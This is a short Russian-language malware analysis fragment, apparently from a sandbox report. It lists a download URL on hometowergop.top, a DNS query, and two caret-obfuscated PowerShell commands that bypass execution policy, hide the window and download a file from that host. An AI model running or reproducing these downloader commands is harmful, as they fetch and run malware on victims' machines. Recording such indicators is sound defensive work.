Техническая информация
- http://hometowergop.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^o^wE^rS^h^e^ll.e^xe^ -^exE^cU^tIO^N^PO^lICy b^YP^ASS^ -n^OPRo^F^ile^ -w^INdo^w^st^YlE hidd^EN (^n^ew-ob^J^E^C^T sYSt^Em.Net.W^EbC^lI^e^N^t^)^.D^OW^nLoaDFI^l^e^('http://homet...
- DNS ASK ho####wergop.top
- '<SYSTEM32>\cmd.exe' /c "p^o^wE^rS^h^e^ll.e^xe^ -^exE^cU^tIO^N^PO^lICy b^YP^ASS^ -n^OPRo^F^ile^ -w^INdo^w^st^YlE hidd^EN (^n^ew-ob^J^E^C^T sYSt^Em.Net.W^EbC^lI^e^N^t^)^.D^OW^nLoaDFI^l^e^('http://homet...' (со скрытым окном)